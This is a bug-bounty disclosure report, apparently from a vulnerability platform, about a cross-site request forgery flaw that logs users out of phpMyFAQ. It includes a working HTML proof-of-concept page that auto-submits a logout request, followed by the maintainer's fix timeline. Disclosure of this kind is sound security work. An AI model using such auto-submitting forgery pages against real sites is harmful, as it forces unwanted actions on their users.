Cross-Site Request Forgery (CSRF) in thorsten/phpmyfaq

Valid

Reported on

Jul 26th 2022


Description

An attacker is able to log out a user if a logged-in user visits the attacker's website.

Proof of Concept

PoC.html

<html>
    <body>
    <script>history.pushState('', '', '/')</script>
        <form action="http://roy.demo.phpmyfaq.de/?action=logout">
            <input type="submit" value="Submit request" />
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>

Impact

This vulnerability is capable of forging users to unintentional logout.

More details

One way GET could be abused here is that a person (competitor perhaps:) placed an image tag with src="<your logout link>" anywhere on the internet, and if a user of your site stumbles upon that page, he will be unknowingly logged out. This is why it should be a POST with a CSRF token.

Note

While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.

We are processing your report and will contact the thorsten/phpmyfaq team within 24 hours. 4 months ago
We have contacted a member of the thorsten/phpmyfaq team and are waiting to hear back 4 months ago
Thorsten Rinne modified the Severity from High to Low 4 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Thorsten Rinne validated this vulnerability 4 months ago
KhanhCM has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Thorsten Rinne gave praise 4 months ago
Thanks for the hint, I fixed that in the backend some months ago, but missed the one in the frontend. Here's the fix: https://github.com/thorsten/phpMyFAQ/commit/3af0bbb0856fe821ba20df22884fc7a7b95c3bcb
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
We have sent a fix follow up to the thorsten/phpmyfaq team. We will try again in 7 days. 4 months ago
We have sent a second fix follow up to the thorsten/phpmyfaq team. We will try again in 10 days. 4 months ago
We have sent a third and final fix follow up to the thorsten/phpmyfaq team. This report is now considered stale. 4 months ago
Thorsten Rinne marked this as fixed in 3.1.7 with commit 3af0bb 2 months ago
Thorsten Rinne has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation